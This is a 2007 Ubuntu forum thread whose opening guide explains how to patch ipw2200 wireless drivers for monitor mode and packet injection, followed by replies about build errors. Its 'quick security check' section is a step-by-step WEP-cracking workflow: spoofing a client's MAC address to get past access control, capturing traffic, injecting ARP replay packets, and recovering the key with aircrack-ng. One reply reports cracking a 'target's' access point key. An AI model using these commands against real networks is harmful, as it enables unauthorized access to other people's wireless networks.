HOWTO: Injection/monitor mode with ipw2200 drivers on Ubuntu Feisty

[motin]

Guide on how to prepare (patch) ipw2200 drivers on Ubuntu Feisty to enable monitor mode and/or injection capabilities
by Motin, based on a mix of several existing guides (thanks all!), adapted to work on Ubuntu Feisty

Purpose: The stock ipw2200 drivers does not support packet injection, nor does it support monitor mode for certain cards. Patching the drivers may make this possible. To make it work for Feisty, it is necessary to start off with certain versions of ieee80211 and ipw2200, namely 1.2.17 and 1.2.1 respectively. (Native Feisty drivers are 1.1.13 and 1.2.0 respectively).

1. Install necessary packages

Code:

    sudo apt-get install build-essential
    sudo apt-get install linux-source
    sudo apt-get install linux-headers-`uname -r`
    sudo apt-get install sharutils

Make sure you have the current linux-headers available in /usr/src/linux

Code:

    sudo mv /usr/src/linux /usr/src/linux_bak
    sudo ln -s /usr/src/linux-headers-`uname -r`/ /usr/src/linux
    ls -l /usr/src/linux/ # Should not be empty

2. Patch drivers

a. Download the source code to ipw2200 version 1.2.1 from: http://ipw2200.sourceforge.net/downloads.php
b. Download the source code to ieee80211 version 1.2.17 from: http://ieee80211.sourceforge.net/#downloads
c. Download the ipw22000 injection patch for v1.2.1 from here: http://ubuntuforums.org/showthread.p...36#post2532936
d. Put all your downloaded files in the same directory and cd into that directory in a terminal
e. Unpack archives

Code:

	tar -xvf ipw2200-1.2.1-inject_patch.tar.gz
	tar -xvf ipw2200-*.tgz
	tar -xvf ieee80211-*.tgz

f. Apply patch

Code:

	patch -p0 < ipw2200-1.2.1-inject.patch
	patch -p0 < ipw2200-1.2.1-inject_Makefile.patch

On top of this, you need to make a manual change in the Makefile described in this post: http://ubuntuforums.org/showthread.p...16#post2576816

g. Compile and install ieee80211

Code:

         cd ..
         cd ieee80211-*
         sudo sh remove-old # This will uninstall earlier drivers, so make sure you have access to a wired connection just in case anything goes wrong
         sudo make
	 # 'y' in all Questions
         sudo make install

h. Compile and install patched ipw2200

Code:

         cd ipw2200-1.2.1
         sudo sh remove-old # This will uninstall earlier drivers, so make sure you have access to a wired connection just in case anything goes wrong
	 # 'y' in all Questions
         sudo make
         sudo make install

i. Check the current versions of ipw2200 and ieee80211 to make sure you have the new drivers installed:

Code:

	dmesg | grep ipw # Output should contain "Intel(R) PRO/Wireless 2200/2915 Network Driver, 1.2.1"
	dmesg | grep ieee # Output should contain "802.11 data/management/control stack, 1.2.17"

3. Load and verifiy the new drivers:

Code:

	sudo rmmod ipw2200
	sudo modprobe ipw2200 rtap_iface=1
	sudo ifconfig rtap0 up
	ifconfig rtap0 # Should not be empty nor print any error message

When you wish to reload the original driver (without the rtap interface), use this:

Code:

	sudo ifconfig rtap0 down
	sudo rmmod ipw2200
	sudo modprobe ipw2200

If this doesn't help restart your computer and you should be back to normal

Quick security check guide
Assuming your wireless network card is configured on eth1:

Code:

# Prepare driver for tap mode
    sudo rmmod ipw2200;
    sudo modprobe ipw2200 rtap_iface=1;
    sudo ifconfig rtap0 up
    ifconfig rtap0

# Optional first step: Open up a terminal and run the following to easily track the status of your wireless card:
watch -n1 "iwconfig eth1";

# Prepare variables
sudo airodump-ng -w capture -i rtap0; # Use this output to find fill out the values below
   # If the current network uses MAC association control you need to (prior to filling below) switch to one of the associated clients' MAC addresses:
   sudo ifconfig eth1 down # Shuts down the interface once again to allow mac changes
   sudo ifconfig eth1 hw ether # MAC of an associated client
   sudo ifconfig eth1 up
export  AP_ESSID=
export  AP_CHANNEL=
export AP_MAC_ADDRESS=
export ETH1_MAC_ADDRESS=
# Open up 4 consoles and run the above commands in all of them

# Terminal No. 1 - Preparing card
# Run exports above
while [ 1 ] ; do
    sudo iwconfig eth1 essid $AP_ESSID key FFFF-FFFF mode managed;
    sleep 1;
    sudo iwconfig eth1 key off;
    sleep 20;
done

# Terminal No. 2 - Start dumping packages
# Run exports above
sudo airodump-ng -c $AP_CHANNEL -w capture -i rtap0;  # Note: We are not using  --ivs since we want to be able to use the fast ptw cracking method
# Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. Otherwise, you will need approximately 250,000 IVs for 64 bit and 800,000-1,500,000 IVs for 128bit keys. 

# Terminal No. 3 - Generate traffic to get more packages dumped faster
# Run exports above
sudo aireplay-ng -3 -b $AP_MAC_ADDRESS -h $ETH1_MAC_ADDRESS -i rtap0 eth1
# Note: with attack 3 that we are using, some other client must connect to the router before aireplay can start sending packets

# Terminal No. 4 - Crack (Try now and then when you have started gathering packets)
# Run exports above
aircrack-ng -b $AP_MAC_ADDRESS capture*.ivs
# Or, if you have installed the newer version (that supports the PTW method that needs less than 10 times less packages)
aircrack-ng -z -b $AP_MAC_ADDRESS capture*.cap

# When key is found and normal connection to the network is preferred:
	sudo ifconfig rtap0 down;
	sudo rmmod ipw2200; 
	sudo modprobe ipw2200;
# If this doesn't help restart and you should be back to normal

EDIT 24-jul-2007 02:22: Fixed the initial apt-get of linux-headers to include the -`uname -r`part...

[Faceache]

hi, thanks for making this guide. I wonder if someone can help me out with a problem I have when trying to complete this..

when attempting to complie things I get the following message:

andy@andy-laptop:/newipw/ieee80211-1.2.17$ sudo sh remove-old
Checking in /lib/modules/2.6.20-16-generic for ieee80211 components...
andy@andy-laptop:/newipw/ieee80211-1.2.17$ sudo make
Makefile:17:
Makefile:18: WARNING: $SHELL not set to bash.
Makefile:19: If you experience build errors, try
Makefile:20: 'make SHELL=/bin/bash'.
Makefile:21:
Checking in /lib/modules/2.6.20-16-generic for ieee80211 components...
make -C /lib/modules/2.6.20-16-generic/build M=/newipw/ieee80211-1.2.17 modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.20-16-generic'
Makefile:499: /usr/src/linux-headers-2.6.20-16-generic/arch/i386/Makefile: No such file or directory
make[1]: *** No rule to make target `/usr/src/linux-headers-2.6.20-16-generic/arch/i386/Makefile'. Stop.
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-16-generic'
make: *** [modules] Error 2


It's probably a silly mistake on my part but I'd appreciate a nudge in the right direction.

TIA

[clemensvb]

Hi motin,

I have the same problem here too. I would appreciate any help.

Thanks.

--->jonas@jonas-laptop:~/Desktop/ipw2200/ieee80211-1.2.18$ sudo sh remove-old
Password:
Checking in /lib/modules/2.6.20-16-generic for ieee80211 components...
find: /lib/modules/2.6.20-16-generic/build/: No such file or directory
/lib/modules/2.6.20-16-generic/kernel/net/ieee80211/ieee80211_crypt_tkip.ko
/lib/modules/2.6.20-16-generic/kernel/net/ieee80211/ieee80211_crypt.ko
/lib/modules/2.6.20-16-generic/kernel/net/ieee80211/ieee80211.ko
/lib/modules/2.6.20-16-generic/kernel/net/ieee80211/ieee80211_crypt_wep.ko
/lib/modules/2.6.20-16-generic/kernel/net/ieee80211/ieee80211_crypt_ccmp.ko
Above files found. Remove? [y],n y
find: /lib/modules/2.6.20-16-generic/build/: No such file or directory
grep: /lib/modules/2.6.20-16-generic/build//.config: No such file or directory
grep: /lib/modules/2.6.20-16-generic/build//include/linux/autoconf.h: No such file or directory
find: /lib/modules/2.6.20-16-generic/build/: No such file or directory

[motin]

This is more or less a guess, but maybe this will help:

Code:

cd /usr/src/linux-headers-`uname -r`/
sudo make xconfig

(Just close the configuration window when it pops up)

I think this creates the necessary configuration files, but really I am not the guy to help out with kernel configuration preparation.

[elninom]

Hi i`m newbie in ubuntu
Why i got that messages?what i should do?

Code:

akiner@Aki:~$ sudo mv /usr/src/linux-headers-2.6.20-16-generic /usr/src/linux-headers-2.6.20-16-generic_bak
mv: cannot stat `/usr/src/linux-headers-2.6.20-16-generic': No such file or directory

Code:

akiner@Aki:~/ipw2200$ patch -p0 < ipw2200-1.2.1-inject.patch
patching file ipw2200-1.2.1/ipw2200.c
Hunk #1 succeeded at 2271 with fuzz 2 (offset 300 lines).
Hunk #2 FAILED at 12048.
1 out of 2 hunks FAILED -- saving rejects to file ipw2200-1.2.1/ipw2200.c.rej

Code:

akiner@Aki:~/ipw2200$ patch -p0 < ipw2200-1.2.1-inject_Makefile.patch
patching file ipw2200-1.2.1/Makefile
Reversed (or previously applied) patch detected!  Assume -R? [n] n
Apply anyway? [n] y
Hunk #1 FAILED at 13.
Hunk #2 FAILED at 30.
2 out of 2 hunks FAILED -- saving rejects to file ipw2200-1.2.1/Makefile.rej
akiner@Aki:~/ipw2200$

Code:

akiner@Aki:~/ipw2200$ sudo rmmod ipw2200
ERROR: Module ipw2200 does not exist in /proc/modules

[motin]

Quote:

Originally Posted by elninom Hi i`m newbie in ubuntu Why i got that messages?what i should do? Code: akiner@Aki:~$ sudo mv /usr/src/linux-headers-2.6.20-16-generic /usr/src/linux-headers-2.6.20-16-generic_bak mv: cannot stat `/usr/src/linux-headers-2.6.20-16-generic': No such file or directory

Code:

    sudo apt-get install build-essential
    sudo apt-get install linux-source
    sudo apt-get install linux-headers-`uname -r` # <-- You need this
    sudo apt-get install sharutils

For the patching, follow the instructions, which were:

Quote:

d. Put all your downloaded files in the same directory and cd into that directory in a terminal

Then apply the patches. You are running from withing the ipw2200 directory...

[elninom]

Code:

ipw2200-1.2.1-inject.patch
ipw2200-1.2.1-inject_Makefile.patch
akiner@aki:~$ patch ipw2200-1.2.1/ipw2200.c ipw2200-1.2.1-inject.patch
patching file ipw2200-1.2.1/ipw2200.c
akiner@aki:~$ patch ipw2200-1.2.1/Makefile ipw2200-1.2.1-inject_Makefile.patch
patching file ipw2200-1.2.1/Makefile
akiner@aki:~$ cd ipw2200-1.2.1
akiner@aki:~/ipw2200-1.2.1$ sudo ./remove-old
Password:
Checking in /lib/modules/2.6.20-15-generic/build/ for ipw2x00 components...
/lib/modules/2.6.20-15-generic/build/include/config/ipw2200.h
/lib/modules/2.6.20-15-generic/build/include/config/ipw2100.h
Unloaded: ipw2200
Above files found.  Remove? [y],n y
CONFIG_IPW2100=m
CONFIG_IPW2100_MONITOR=y
CONFIG_IPW2200=m
CONFIG_IPW2200_MONITOR=y
CONFIG_IPW2200_RADIOTAP=y
CONFIG_IPW2200_PROMISCUOUS=y
CONFIG_IPW2200_QOS=y
CONFIG_IPW2100_FS_AMILO_M7400=m
Above definitions found.  Comment out? [y], n y
akiner@aki:~/ipw2200-1.2.1$ sudo make
mkdir -p /home/akiner/ipw2200-1.2.1/tmp/.tmp_versions
make -C /lib/modules/2.6.20-15-generic/build M=/home/akiner/ipw2200-1.2.1 MODVERDIR=/home/akiner/ipw2200-1.2.1/tmp/.tmp_versions modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.20-15-generic'
  CC [M]  /home/akiner/ipw2200-1.2.1/ipw2200.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/akiner/ipw2200-1.2.1/ipw2200.mod.o
  LD [M]  /home/akiner/ipw2200-1.2.1/ipw2200.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-15-generic'
akiner@aki:~/ipw2200-1.2.1$ sudo make install
mkdir -p /home/akiner/ipw2200-1.2.1/tmp/.tmp_versions
make -C /lib/modules/2.6.20-15-generic/build M=/home/akiner/ipw2200-1.2.1 MODVERDIR=/home/akiner/ipw2200-1.2.1/tmp/.tmp_versions modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.20-15-generic'
  Building modules, stage 2.
  MODPOST 1 modules
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-15-generic'
install -d /lib/modules/2.6.20-15-generic/kernel/drivers/net/wireless/
install -m 644 -c ipw2200.ko /lib/modules/2.6.20-15-generic/kernel/drivers/net/wireless/
/sbin/depmod -a 2.6.20-15-generic
Don't forget to copy firmware to your hotplug's firmware directory and have the
hotplug tools in place.
See INSTALL for more information.
akiner@aki:~/ipw2200-1.2.1$ sudo rmmod ipw2200
ERROR: Module ipw2200 does not exist in /proc/modules

I`m trying two days but everytime i had same error
ERROR: Module ipw2200 does not exist in /proc/modules
also patches now properly working only "patching file ipw2200-1.2.1/ipw2200.c" say.If applied again :

Code:

Hunk #1 succeeded at 2031 with fuzz 2 (offset 60 lines).
Hunk #2 FAILED at 11808.
1 out of 2 hunks FAILED -- saving rejects to file ipw2200-1.2.1/ipw2200.c.rej

Can anybody already patched working driver files to send me?my email elninomelninon@gmail.com

All files in same directory
I tried updated ubuntu 7.04,kubuntu 7.04,ubuntu 6.10 however never success...
Now i have only wired connection,wireless connection is unshow
Please help me im out of my mind
Thanks

[BOBSONATOR]

Nvm, try this

http://www.aircrack-ng.org/doku.php?id=ipw2200

[kmcq]

hey everyone, thanks for the guide, i seem to have an issue when i actually try and use the aircrack suite... ive looked all over this board and aircrack's board for tutorials on the ipw2200, so i think i correctly set it up, and i think im correctly using the aircrack suite, yet when i try to use attack 3 (er the arpreplay or whatever?) it will read lots of packets, but i am not sending or receiving packets, and my data packets are not increasing AT ALL

i then tried to follow a different guide using attack -4 i believe (chopchop perhaps?) this seemed to be doing the trick, but when i try to crack the key, i have been unsuccessful thus far event though im using -ptw and i have 375738 IVs, maybe its just a tough key =\

i am running ubuntu feisty 7.04, on a dell latitude c400, using an internal intel 2200 bg wifi card using ipw2200 1.2.1 (and its patched), ieee80211 is also updated (1.2.17 i think?), and im using aircrack suite ver. .9.1 r656 that i got today off their repo... any tips would be great THANKS

edit: nevermind, i tried the guide on the aircrack site again, and tried the guide for quick security check and it worked, and i was able to crack the key as well... one suggest however, i ran into trouble with aircrack whenever i wanted to use .cap files... i discovered that if i ran airodump with -i, it would save the dump file as an .ivs file, removing -i saved it as a .cap, which i needed to use -z for aircrack... but other then that it worked great

one other note, i had had some difficulty setting up my card in iwconfig to auth to my target's AP, and on top of that the gnome wireless network manager kept authing me to open networks, so what i did was told the gnome manager to auth me to my target and when it asked for a key i just punched a few keys to make it shut up, it seemed to work just as well as running iwconfig ethx essid ... etc.
i was able to crack what i think was 108bit in 3:25 according to aircrack's timer using just over 40000 IVs, thanks a bunch for this guide

[seffius]

Thank you so much for this guide! Been trying for 2 days and couldn't get these drivers loaded until I came across this. The only hiccup I had in the process was after :

Code:

dmesg | grep ipw # Output should contain "Intel(R) PRO/Wireless 2200/2915 Network Driver, 1.2.1"
dmesg | grep ieee # Output should contain "802.11 data/management/control stack, 1.2.17"

It was still showing the old versions, but after a restart it worked like a charm!